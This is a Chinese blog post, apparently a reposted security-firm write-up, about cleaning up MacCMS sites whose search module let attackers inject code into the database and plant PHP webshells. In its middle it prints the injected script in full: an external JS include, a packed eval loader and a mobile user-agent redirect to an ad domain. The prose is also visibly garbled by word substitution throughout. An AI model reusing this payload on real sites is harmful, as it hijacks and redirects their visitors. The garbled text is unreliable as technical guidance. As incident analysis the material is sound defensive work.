2020年刚开始,苹果CMS被爆出数据库代码履行缝隙,许多的电影网站被挂马,特别电影的页面被篡改植入了歹意代码,数据库中的VOD表里的d_name被悉数修正,导致网站翻开后直接跳转到S站或许弹窗广告,现在该maccms缝隙受影响的苹果体系版别是V8,V10,许多客户网站被重复篡改,很无法,经过朋友介绍找到咱们寻求技能上支撑,避免网站被挂马。依据客户的反响,服务器选用的是linux centos体系,苹果CMS版别是最新的V10版别,咱们当即建立网站安全应急呼应处理,协助客户处理网站被进犯的问题。
首要许多站长认为晋级了苹果CMS官方最新的缝隙补丁就没问题了,经过咱们技能对补丁的代码安全剖析发现,该缝隙补丁对当时的数据库代码履行缝隙是没有任何作用的,杯水车薪,网站还会持续被进犯。
咱们来看下客户网站现在产生的挂马问题,翻开网站主页以及各个电影地址都会被刺进挂马代码,如下图所示:
打包紧缩了一份网站源代码,以及nginx网站日志文件,咱们工程师在根目录下发现被上传了网站webshell木马文件,经过网站日志溯源追寻咱们查看到访问这个PHP脚本木马文件的是一个韩国的IP,详细的代码如下图:
代码做了加密处理,咱们对其解密发现该代码的功用可以对网站进行上传,下载,修正代码,操作数据库等功用,归于PHP大马的领域,也叫webshell木马文件,咱们又对苹果CMS的源代码进行了人工安全审计,发现index.php代码对查找模块上做的一些歹意代码过滤查看存在缝隙,可导致进犯者绕过安全过滤,直接将SQL刺进代码履行到数据库傍边去。
咱们对数据库进行安全检测发现,在VOD表的d_name被批量植入了挂马代码:
<scriptsrc=https://www.11px.cn/1.js> eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){returnd[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(newPRegExp('\\b'+e(c)+'\\b','g'),k[c]);returnp;}('4.5(\'<61="3/2"7="//0.b.c.d/8.0"><\\/9\'+\'a>\');',14,14,'js|type|javascript|text|document|write|script|src|20487493|scr|ipt|users|51|la'.split('|'),0,{}));varLOUMtBZeW=navigator["userAgent"]["toLowerCase"]()["match"](/(ipod|iphone|ipad|android|coolpad|mmp|smartphone|midp|wap|xoom|symbian|j2me|blackberry|wince)/i)!=null;if(LOUMtBZeW){setTimeout('window.location.href="https://m.qiche-hangjia.com:168/ua80666/"',500)}
这方法很专业,不是一般的进犯者所为,针对手机端做了跳转以及躲藏嵌入,让网站运营者底子无法发觉发现,还判断了cookies来路,到达条件才干触发进犯者植入的广告代码。持续安全剖析与追寻,发现了进犯者的方法,POST提交到/index.php?m=vod-search,POST内容是加密的这儿就不便利发出了,归于缝隙进犯了,或许会给其他运用苹果CMS体系的网站形成进犯,咱们技能对POST进犯代码进行了解密剖析,发现确实是绕过了苹果官方V8,V10体系的代码安全过滤,直接将挂马代码刺进到了数据库里了。
问题本源找到了,接下来咱们对客户的苹果CMS缝隙进行修正,对POST提交过来的参数进行严厉的过滤与转义,对vod-search含有的歹意字符进行强制转化,对歹意代码进行安全阻拦,避免传入到后端进行数据库里的代码履行。对网站代码里存在的木马后门进行了全面的人工审计与查看,合计发现5个后门,其他的在缓存目录傍边,跟程序代码混杂在一起,也都删除了,对网站的后台地址进行了更改,之前后台运用的地址被进犯者把握,对管理员的账号密码进行了加强,至此苹果CMS网站被挂马的问题才得以彻底处理,假如您的maccms也被一向挂马,自己懂代码的话可以对POST到index.php的数据进行安全阻拦与查看,避免歹意代码的刺进,假如不是太懂的话,主张找专业的网站安全公司来处理处理。
声明:有的资源均来自网络转载,版权归原作者所有,如有侵犯到您的权益 请联系邮箱:123456@qq.com 我们将配合处理!
原文地址:最新苹果cms漏洞被频繁挂马该如何解决发布于2022-05-12 08:44:45